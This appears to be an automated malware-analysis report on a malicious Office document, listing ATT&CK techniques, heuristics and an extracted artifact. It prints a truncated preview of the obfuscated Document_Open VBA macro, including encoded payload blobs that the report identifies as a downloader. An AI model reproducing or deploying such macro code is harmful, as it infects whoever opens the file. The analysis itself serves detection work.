MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a Document_Open macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. This is further supported by the presence of VBA p-code auto-execution with execution tokens. The macro's obfuscated nature and the presence of a long encoded blob suggest it is designed to download and execute a second-stage payload, characteristic of a downloader malware.
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59408 bytes |
SHA-256: e09dd843fbe2255fd3e9361c64e51a7baa89f8232333d4ea94738931ddfab321 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim gYcRJb gYcRJb = 165 While gYcRJb < 871 gYcRJb = gYcRJb + 38 Wend cezrcExD = 19944 rnmrZ = yK2Y5ZOM8 & gYcRJb If 78 + 123 = 19650 / 1310 Then aYI1Nv = "ALzgH" End If ykMStc9i = "DXOxr2Zc" cLEY2S4NI = aYI1Nv & ykMStc9i Dim RtfQK RtfQK = 165 While RtfQK <= 871 RtfQK = RtfQK + 38 Wend ozUXSY3s = 19944 Z6Qqk3dF7 = gSgQDWTyv & RtfQK If 78 + 123 = 19650 / 1310 Then UBL6tS = "lq1D8" End If TJl7UQPd = 19944 HPy4tv = UBL6tS & TJl7UQPd If 26356 / 44 = 1696 - 1680 Then SMWVZO = "jlcKx" End If gsLqGxrV = "bWlCT6" vKhp5nJ = SMWVZO & gsLqGxrV If 26356 / 44 = 1696 - 1680 Then zZlqbxWgM = "azNGeQCDj" End If LDnICL = 35453 LAP84mrNY = zZlqbxWgM & LDnICL Dim kyRSsP2UC kyRSsP2UC = 2 While kyRSsP2UC <= 355 kyRSsP2UC = kyRSsP2UC + 19 Wend Z94OZ = "o8TGin" stSJAd = UyIWPm & kyRSsP2UC Dim nPE6dujW8 nPE6dujW8 = 2 While nPE6dujW8 < 355 nPE6dujW8 = nPE6dujW8 + 19 Wend g8m74xo = "N8Skt" IyGwv9 = VOFKQe5IX & nPE6dujW8 If 52 * 9 = -1002 + 1017 Then rBLhj8 = "TOAwj6" End If gRqJm = 29947 MKWdV3L = rBLhj8 & gRqJm ktxhPmp4 = "a3VkbVZ5YzJsdmJqc2thMkZ" YdimkHO = "6YW5KT1Z6Z2dQU0FuYlU5c2RtbElNV1psSnpza2QyMTZNbTR1YUdWaFpHVnljMXNuZFhObGNp" CLjWxAH = "MWhaMlZ1ZENkZElEMGdKRWxMV2psMFJXTTdKSE5pVTFCNk1tY2dQU0FuWVZKTlp6TW5PeVJKUzFvNWRFVmpMbU5zYjNObEtDazdKSE0zWTNOTklEMGdKMjFWWlZaa0p6c2tTVXRhT1hSRll5NXhkV2wwT3lSTlZtUlhieUE5SUNkWG" yC9HiOL = "FHZHllSEZWSnpza1duQllVWEY2Y3lBOUlDUm" Dim WNLHGVIQv WNLHGVIQv = 223 While WNLHGVIQv <= 359 WNLHGVIQv = WNLHGVIQv + 13 Wend rz1bea2yj = "IYCmiOgX" Nkxr8MHOR = yKTh5 & WNLHGVIQv If 826 + 37 = -5511 + 5512 Then y2g8WFnC = "FaD2ktr" End If NnABWz = 42991 rK59xtRUr = y2g8WFnC & NnABWz Dim MsYdOxP3 MsYdOxP3 = 223 While MsYdOxP3 <= 359 MsYdOxP3 = MsYdOxP3 + 13 Wend d58a40l = "lpuXf" BE6lz0Y = KiNn5EF & MsYdOxP3 Dim fW2mkbN fW2mkbN = 223 While fW2mkbN < 359 fW2mkbN = fW2mkbN + 13 Wend cIo7Wes = "OCTWtFUN9" jauD3Qo2 = EAr9FCsI & fW2mkbN Dim BzrM2nmp BzrM2nmp = 83 While BzrM2nmp < 361 BzrM2nmp = BzrM2nmp + 24 Wend icBKsG4 = "y8QMHdyWU" fgpyXCPd = Zo4LdZY52 & BzrM2nmp Dim i3CXeDBT i3CXeDBT = 83 While i3CXeDBT < 361 i3CXeDBT = i3CXeDBT + 24 Wend aOrAiqRt = 28101 zpIrQ = JCjvwhn & i3CXeDBT If 61 + 131 = 10450 / 950 Then iN1azt = "Xdj0ZF" End If dxM7CgR = "irNREBHm" hxzfiN = iN1azt & dxM7CgR Dim SFAKT7cQe SFAKT7cQe = 27 While SFAKT7cQe <= 378 SFAKT7cQe = SFAKT7cQe + 22 Wend nzYlK = 48852 zbfkRAQ7 = Z6tm8RhQ & SFAKT7cQe If 61 + 131 = 10450 / 950 Then PIUSLvn = "wNOQy40C" End If JtJWsbU = "qf9LlVT" xmQF5fp2 = PIUSLvn & JtJWsbU If 38 < 236 Then ' dZHtJu Else ' BuNrl4M MsgBox "WFy12uReG" End If If 833 - 13 = 24970 / 4994 Then FCVc8i6E = "wCV8hI4js" End If wFAvxr = "o7hfi6c9" Nr4Td3p = FCVc8i6E & wFAvxr If 833 - 13 = 24970 / 4994 Then Xmylws = "xc8y0P73" End If H2FdCpDHq = 60726 nx6W2yF = Xmylws & H2FdCpDHq Dim wuR7v wuR7v = ktxhPmp4 & YdimkHO & CLjWxAH & yC9HiOL o97oaKG = "kzUW5PeVIzYlhveW" SI2lAhQNf = "JpNUViM2R1Ykc5aFpFWnBiR1VvSkZCNlZuWlFSazFDVnk1VWIxTjBjbWx1WnlncExDQWtXbkJZVVhGNmN5azdKRnAxYzB4SlJXY2dQU0FuVFhadlYyTlVVU2M3VTNSaGNuUXRVSEp2WTJWemN5QWtXbkJZVVhGNmN6c2tiVTVXYjNZM0lEMGdKMU5UWTBSV1MyUW5P" a3uOS = "Mkp5WldGck8zMWpZWFJqYUhza1psQmpSMnBrSUQwZ0oyNVVNbEZhVnljN2ZTU" XgsZB5 = "nZjVzF5VWtOTVZVa2d" ezMbmZ = "QU0FuV2tONWREWW5PMzA9" If 997 - 9 = -1905 + 1919 Then gcy547Sk = "WXYc2iHKO" End If LncNY = "gInqVpZR" YBnp1y = gcy547Sk & LncNY If 18 < 129 Then ' Shl8cI Else ' VysnxYV MsgBox "CQulK7mn" End If If 62 < 216 Then ' nEWwfL3i Else ' MxcyHU MsgBox "v6lt9ar" End If If 62 < 216 Then ' nXlFRbgAG Else ' eSzLN MsgBox "Q29sb" End If If 547 - 17 = 20 - 8 Then bHx0hv = "XHvfW5by" End If FPhdDS = "u5jA7n" nzvCBYpI = bHx0hv & FPhdDS Dim IPSYL6 IPSYL6 = 47 While IPSYL6 < 291 IPSYL6 = I ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.